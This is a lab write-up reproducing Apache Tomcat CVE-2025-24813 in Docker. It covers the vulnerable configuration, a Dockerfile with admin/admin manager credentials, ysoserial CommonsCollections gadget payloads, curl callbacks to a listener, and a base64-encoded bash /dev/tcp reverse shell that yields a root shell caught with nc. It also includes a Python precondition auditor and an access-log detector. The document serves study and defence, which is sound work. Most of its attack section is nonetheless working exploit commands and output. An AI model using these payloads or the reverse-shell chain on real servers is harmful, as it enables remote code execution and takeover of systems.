Tomcat - CVE-2025-24813

Last updated 2 months ago

CVE-2025-24813 is a flaw in Apache Tomcat's handling of partial PUT requests that can lead to remote code execution, information disclosure, or information corruption.

An attacker can achieve remote code execution only if all of the following conditions hold:

  • Writes are enabled for the default servlet (disabled by default)

  • Partial PUT is supported (enabled by default)

  • The application uses Tomcat's file-based session persistence with the default storage location

  • The application includes a library that can be leveraged in a deserialization attack

The vulnerability affects both Windows- and Linux-based installations running any of the following Apache Tomcat versions:

  • 9.0.0.M1 <= Apache Tomcat <= 9.0.98

  • 10.1.0-M1 <= Apache Tomcat <= 10.1.34

  • 11.0.0-M1 <= Apache Tomcat <= 11.0.2

The first public PoC, published by iSee857, targeted a Windows installation; below is the Linux equivalent.

Setup test environment

To set up a test Docker container we need to tweak the Dockerfile a little to include commons-collections-x.x.x.jar, as well as the non-default configuration in web.xml and context.xml.

<!-- web.xml (enable write for default servlet) -->
<init-param>
    <param-name>readonly</param-name>
    <param-value>false</param-value>
</init-param>

<!-- context.xml (file-based session persistence with default storage location) -->
<Manager className="org.apache.catalina.session.PersistentManager">
    <Store className="org.apache.catalina.session.FileStore"/>
</Manager>
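As an added defender-side example (not part of the original write-up), the following Python audits a Tomcat instance for the preconditions listed above: an affected version, readonly=false on the default servlet in web.xml, a PersistentManager with a FileStore and no custom directory in context.xml, and a commons-collections jar in lib/. The sample web.xml and context.xml strings are constructed to mirror this test environment, and the version parser's milestone ordering is an assumption made to cover the ".M1"/"-M1" bounds in the advisory.

```python
import re
import xml.etree.ElementTree as ET

# Affected ranges from the advisory, both ends inclusive.
AFFECTED = [("9.0.0.M1", "9.0.98"), ("10.1.0-M1", "10.1.34"), ("11.0.0-M1", "11.0.2")]

def parse_version(v):
    """'10.1.0-M1' -> (10, 1, 0, 0, 1): a milestone (flag 0) sorts before its GA build (flag 1)."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:[.-]M(\d+))?", v.strip())
    if not m:
        raise ValueError(f"unrecognised Tomcat version: {v!r}")
    a, b, c, ms = m.groups()
    return (int(a), int(b), int(c)) + ((1, 0) if ms is None else (0, int(ms)))

def default_servlet_writable(web_xml):
    """Condition 1: the 'default' servlet carries init-param readonly=false."""
    root = ET.fromstring(re.sub(r'\sxmlns="[^"]+"', "", web_xml))  # drop the default namespace
    for servlet in root.iter("servlet"):
        if servlet.findtext("servlet-name", "").strip() == "default":
            params = {p.findtext("param-name", "").strip(): p.findtext("param-value", "").strip()
                      for p in servlet.iter("init-param")}
            return params.get("readonly", "true").lower() == "false"
    return False

def file_store_default_dir(context_xml):
    """Condition 3: a PersistentManager whose FileStore sets no custom 'directory'."""
    return any(
        st.get("className", "").endswith(".FileStore") and not st.get("directory")
        for mgr in ET.fromstring(context_xml).iter("Manager")
        if mgr.get("className", "").endswith(".PersistentManager")
        for st in mgr.iter("Store"))

def audit(version, web_xml, context_xml, lib_files):
    """Condition 2 (partial PUT) is on by default and has no switch to inspect here."""
    pv = parse_version(version)
    found = {
        "affected_version": any(parse_version(lo) <= pv <= parse_version(hi) for lo, hi in AFFECTED),
        "default_servlet_writable": default_servlet_writable(web_xml),
        "file_store_default_dir": file_store_default_dir(context_xml),
        "gadget_library": any(re.match(r"commons-collections\d*-\d", f) for f in lib_files),
    }
    found["exploitable"] = all(found.values())
    return found

# Constructed sample inputs mirroring the test environment described above.
WEB_XML = """<web-app xmlns="https://jakarta.ee/xml/ns/jakartaee"><servlet>
<servlet-name>default</servlet-name><init-param><param-name>readonly</param-name>
<param-value>false</param-value></init-param></servlet></web-app>"""
CONTEXT_XML = """<Context><Manager className="org.apache.catalina.session.PersistentManager">
<Store className="org.apache.catalina.session.FileStore"/></Manager></Context>"""
```

On a real host, feed it the output of `version.sh`, the contents of conf/web.xml and conf/context.xml, and `os.listdir` of lib/; the `audit("11.0.1", WEB_XML, CONTEXT_XML, ["commons-collections-3.2.1.jar"])` case reports every condition as met.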

I decided to go with Tomcat version 11.0.1 in my test environment.

# Dockerfile
# Stage 1: Build stage to copy web apps and make modifications
FROM tomcat:11.0.1 as build

# Copy the necessary configuration files
COPY ./web.xml /usr/local/tomcat/conf/web.xml
COPY ./context.xml /usr/local/tomcat/conf/context.xml
COPY ./commons-collections-3.2.1.jar /usr/local/tomcat/lib/

# Copy web applications (ROOT and manager) from the `webapps.dist` folder inside the container
RUN mkdir -p /usr/local/tomcat/webapps/ROOT && \
    cp -r /usr/local/tomcat/webapps.dist/ROOT/* /usr/local/tomcat/webapps/ROOT && \
    cp -r /usr/local/tomcat/webapps.dist/manager /usr/local/tomcat/webapps/manager && \
    sed -i 's/allow="[^"]*"/allow=".*"/' /usr/local/tomcat/webapps/manager/META-INF/context.xml && \
    sed -i '/<\/tomcat-users>/d' /usr/local/tomcat/conf/tomcat-users.xml && \
    echo '  <role rolename="manager-gui"/>' >> /usr/local/tomcat/conf/tomcat-users.xml && \
    echo '  <role rolename="admin-gui"/>' >> /usr/local/tomcat/conf/tomcat-users.xml && \
    echo '  <user username="admin" password="admin" roles="manager-gui,admin-gui"/>' >> /usr/local/tomcat/conf/tomcat-users.xml && \
    echo '</tomcat-users>' >> /usr/local/tomcat/conf/tomcat-users.xml

# Stage 2: Final image to run Tomcat
FROM tomcat:11.0.1

# Copy from the build stage
COPY --from=build /usr/local/tomcat/webapps /usr/local/tomcat/webapps
COPY --from=build /usr/local/tomcat/conf /usr/local/tomcat/conf
COPY --from=build /usr/local/tomcat/lib /usr/local/tomcat/lib

# Expose the necessary port
EXPOSE 8080

# Start Tomcat in the foreground
CMD ["catalina.sh", "run"]
$ docker build -t tomcat1101 .
$ docker run -d -p 8888:8080 --name tomcat1101 tomcat1101

Verify vulnerability

Step 1: Uploading a Malicious Serialized Session

Create some random serialized data and upload it with PUT /anything/session. The payload is not important at this stage; we just want to verify that the target responds with HTTP 409.

kpen :: ~/tools » java -jar ysoserial-all.jar CommonsCollections7 whoami | base64 -w0
rO0ABXNyABNqYXZhLnV0a...

If we log in to the Docker container we can see that the new serialized session has been created in the directory /usr/local/tomcat/work/Catalina/localhost/ROOT.

Step 2: Triggering Execution via Session Cookie

Once the session file is uploaded, the attacker triggers deserialization by sending a simple GET request with a JSESSIONID cookie pointing at the malicious session.

Tomcat, seeing this session ID, retrieves the stored file and deserializes it; the gadget chain inside runs the embedded command, giving the attacker remote code execution.

I've noticed during my testing that using CommonsCollections6 (cc6) results in an HTTP 500 response, while cc7 gets an HTTP 200 response. Both are valid and the payload is triggered as seen below, but I guess cc7 has the edge in terms of stealth.

kpen :: ~/tomcat » java --add-opens java.base/java.util=ALL-UNNAMED -jar ../tools/ysoserial-all.jar CommonsCollections6 'curl http://172.17.0.1:4444/cc6' | base64 -w0 > cc6.ser
kpen :: ~/tomcat » java --add-opens java.base/java.util=ALL-UNNAMED -jar ../tools/ysoserial-all.jar CommonsCollections7 'curl http://172.17.0.1:4444/cc7' | base64 -w0 > cc7.ser

kpen :: ~/tomcat » python3 exp.py url.txt cc6.ser
kpen :: ~/tomcat » python3 exp.py url.txt cc7.ser

kpen :: ~/tomcat » python3 -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
172.17.0.2 - - [19/Mar/2025 13:10:04] code 404, message File not found
172.17.0.2 - - [19/Mar/2025 13:10:04] "GET /cc6 HTTP/1.1" 404 -
172.17.0.2 - - [19/Mar/2025 13:10:19] code 404, message File not found
172.17.0.2 - - [19/Mar/2025 13:10:19] "GET /cc7 HTTP/1.1" 404 -
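From the defender's side, the request sequence described in Steps 1 and 2 (a PUT answered with 409, followed shortly by a GET from the same client) can be hunted for in Tomcat's access log. This is an added example, not part of the original write-up; the log lines are constructed in the AccessLogValve "common" format, and the 120-second correlation window is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')

def parse_line(line):
    """Return host, timestamp, method, path and status, or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, ts, method, path, status = m.groups()
    return {"host": host, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "path": path, "status": int(status)}

def detect_partial_put_chain(lines, window=timedelta(seconds=120)):
    """Flag clients whose PUT was answered 409 and who then sent a GET within `window`.
    The GET's status is reported but not filtered on: the write-up saw both 500 (cc6)
    and 200 (cc7) when the payload fired."""
    puts, alerts = defaultdict(list), []
    for ev in filter(None, map(parse_line, lines)):
        if ev["method"] == "PUT" and ev["status"] == 409:
            puts[ev["host"]].append(ev)
        elif ev["method"] == "GET":
            for put in puts[ev["host"]]:
                if timedelta(0) <= ev["time"] - put["time"] <= window:
                    alerts.append((ev["host"], put["path"], ev["path"], ev["status"]))
    return alerts

# Constructed sample log (not real traffic): one benign client and one matching chain.
SAMPLE_LOG = [
    '10.0.0.7 - - [19/Mar/2025:13:09:58 +0000] "GET /index.jsp HTTP/1.1" 200 1895',
    '172.17.0.1 - - [19/Mar/2025:13:10:01 +0000] "PUT /anything/session HTTP/1.1" 409 -',
    '10.0.0.7 - - [19/Mar/2025:13:10:03 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '172.17.0.1 - - [19/Mar/2025:13:10:04 +0000] "GET / HTTP/1.1" 500 -',
]

if __name__ == "__main__":
    for host, put_path, get_path, status in detect_partial_put_chain(SAMPLE_LOG):
        print(f"{host}: PUT {put_path} -> 409, then GET {get_path} -> {status}")
```

Any PUT reaching the default servlet is already worth an alert on a host where readonly should be true; the 409-then-GET correlation narrows it to the pattern this PoC produces.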

POC || GTFO

## build payload
kpen :: ~/tomcat » echo "bash -i >& /dev/tcp/172.17.0.1/4444 0>&1" | base64   
YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTcuMC4xLzQ0NDQgMD4mMQo=
kpen :: ~/tomcat » java --add-opens java.base/java.util=ALL-UNNAMED -jar ../tools/ysoserial-all.jar CommonsCollections6 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTcuMC4xLzQ0NDQgMD4mMQo=}|{base64,-d}|{bash,-i}' | base64 -w0 > payload.ser

## run exploit
kpen :: ~/tomcat » python3 exp.py

## capture revshell
kpen :: ~/tomcat » nc -lvnp 4444                                                   
listening on [any] 4444 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 59082
root@1ad748140a56:/usr/local/tomcat# id && hostname
uid=0(root) gid=0(root) groups=0(root)
1ad748140a56
